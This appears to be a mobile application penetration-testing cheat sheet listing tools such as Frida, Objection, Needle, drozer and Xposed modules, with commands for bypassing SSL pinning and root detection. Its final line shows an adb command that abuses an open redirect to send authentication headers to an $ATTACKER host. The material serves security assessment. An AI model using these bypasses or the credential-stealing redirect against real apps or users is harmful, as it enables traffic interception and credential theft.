- Genymotion Cloud: Cloud-based Android emulators running on SaaS or as virtual images on AWS, GCP or Alibaba Cloud (PaaS)
- Genymotion Desktop: Desktop Android emulator
Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.
- Python 3
sudo pip install frida-tools
Launch SnapChat on your iPhone and trace crypto API calls
frida-trace -U -f com.toyopagroup.picaboo -I "libcommonCrypto*"
Objection is a runtime mobile exploration toolkit, powered by Frida. It was built with the aim of helping assess mobile applications and their security posture without the need for a jailbroken or rooted mobile device.
git clone https://github.com/sensepost/objection
pip3 install objection
SSL pining bypass for iOS:
objection -N explore -q
SSL pining bypass for Android:
objection -N explore -q
- http://pentestcorner.com/introduction-to-fridump/: Memory dumper tool for Android and iOS
Needle is an open source modular framework which aims to streamline the entire process of conducting security assessments of iOS applications, and acts as a central point from which to do so. Needle is intended to be useful not only for security professionals, but also for developers looking to secure their code. A few examples of testing areas covered by Needle include: data storage, inter-process communication, network communications, static code analysis, hooking and binary protections.
- Jailbroken device
- Apt 0.7 Strict
Framework that can change the behaviour of the system and apps without touching any APKs
drozer console connect
- https://github.com/mwrlabs/drozer: The Leading Security Assessment Framework for Android
Cydia Substrate - Cydia Substrate for Android enables developers to make changes to existing software with Substrate extensions that are injected in to the target process's memory.
- Disabling OkHttp’s SSL Pinning on Android Apps https://medium.com/@cooperthecoder/disabling-okhttps-ssl-pinning-on-android-bd116aa74e05
- Xposed Module: Just Trust Me - Xposed Module to bypass SSL certificate pinning.
adb install ./JustTrustMe.apk
- Xposed Module: SSLUnpinning - Android Xposed Module to bypass SSL certificate validation (Certificate Pinning).
adb install mobi.acpm.sslunpinning_latest.apk
- Cydia Substrate Module: Android SSL Trust Killer: Blackbox tool to bypass SSL certificate pinning for most applications running on a device.
adb install Android-SSL-TrustKiller.apk
- Frida CodeShare The Frida CodeShare project is comprised of developers from around the world working together with one goal - push Frida to its limits in new and innovative ways.
- Bypassing Root Detection
frida --codeshare dzonerzy/fridantiroot -f YOUR_BINARY
- Bypassing SSL Pinning
frida --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida -f YOUR_BINARY
- Just Trust Me
- Root Detection:
Howto use open redirect to steal credentials:
adb shell am start -a android.intent.action.VIEW $INTENT://$DEEPLINK?$PARAM=https://$ATTACKER --ez authentication_header true